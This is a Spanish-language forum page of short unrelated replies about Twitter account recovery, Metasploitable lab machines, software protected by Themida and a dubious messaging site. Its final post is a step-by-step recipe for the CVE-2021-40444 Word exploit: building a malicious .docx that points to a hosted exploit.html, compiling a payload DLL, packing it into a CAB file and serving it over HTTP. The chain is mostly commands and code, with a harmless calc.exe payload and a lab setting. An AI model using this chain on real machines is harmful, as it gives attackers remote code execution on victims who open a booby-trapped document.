Buenas noches y bienvenida al foro, según tengo entendido Twitter te envía el código de verificación al email que tengas previo al cambio de email. Deberías fijarte en tu email original de twitter si no hay una especie de enlace para verificar que no fuiste vos quién cambió el email.


B#

El programa que subiste está protegido aparentemente por Themida, quizás si no traiga la protección anti-dumpeo podrías rearmar el programa y luego analizar las máquinas virtuales que tenga cada código virtualizado... Si querés crackear esto la vas a tener muy difícil dado a que las máquinas virtuales de Oreans son más complicadas que existen, hasta donde tengo entendido.


B#

¿Probaste por aplicaciones populares de smartphones?


B#

Si, un USB mínimo de 8 GB hasta ahora...

Ya se te dijo como 200 veces que NO POR EL MOMENTO


Si desactivás los requisitos esos pues NO


B#

Ahí en esa página dice explícitamente únicamente para España... Datos que se pueden ver claramente son que el copyright es del 2009, fecha en que whatsapp salió a la luz, aparte el sitio web está maquetado con html 4.01, por lo que nunca fue actualizado.

"Asumiendo" que sea real, con énfasis en asumiendo, dudo mucho que la API siga funcionando correctamente si no se actualizó en más de 11 años.

¿Por otra parte con que necesidad? Si querés enviar mensajes gratuitos a alguien a nivel nacional e internacional existe whatsapp, telegram y signal.


B#

Primer resultado en google:

https://www.askcybersecurity.com/where-are-my-saved-passwords-in-chrome/


B#

Comprate un cargador original de Dell y no te va a salir más...


B#

Metasploitable 3 si mal no tengo entendido es un Windows 7 / 2008 el cuál debería tener la vulnerabilidad de eternalblue si recuerdo haber leído alguna vez por internet...



Por otra parte te dejo Metasploitable 2 el cuál tiene es un Ubuntu viejo con al menos 3 puertos al que se le pueden explotar y hacer un RCE (vsftpd, smb y unreal irc).


B#

Podrías probar con KDEnlive


B#

Fuente: https://github.com/lockedbyte/CVE-2021-40444

Generando el documento .docx:

Ir a maldoc/word/_rels/document.xml.rels y editar los textos http://<HOST> con el URL del archivo exploit.html

Luego se genera el documento .docx

cd maldoc/ ; zip -r maldoc.docx *

Generar el archivo dll

#include <windows.h>
 
void exec(void) {
	system("C:\\Windows\\System32\\calc.exe");
	return;
}
 
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason, 
    LPVOID lpReserved )
{
    switch( fdwReason ) 
    { 
        case DLL_PROCESS_ATTACH:
           exec(); 
           break;
 
        case DLL_THREAD_ATTACH:
            break;
 
        case DLL_THREAD_DETACH:
            break;
 
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

Compilar:

i686-w64-mingw32-gcc -shared calc.c -o calc.dll

Instalar la dependencia lcab

sudo apt-get install lcab

cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab

Copiar el archivo out.cab en el directorio www/, modificar exploit.html para apuntar a http://localhost/out.cab

Ejecutar el script: patch_cab.py

Finalmente crear el servidor:

cd www/ ; sudo python3 -m http.server 80

Parte final

Ejecutar maldoc.docx en una Máquina virtual.



B#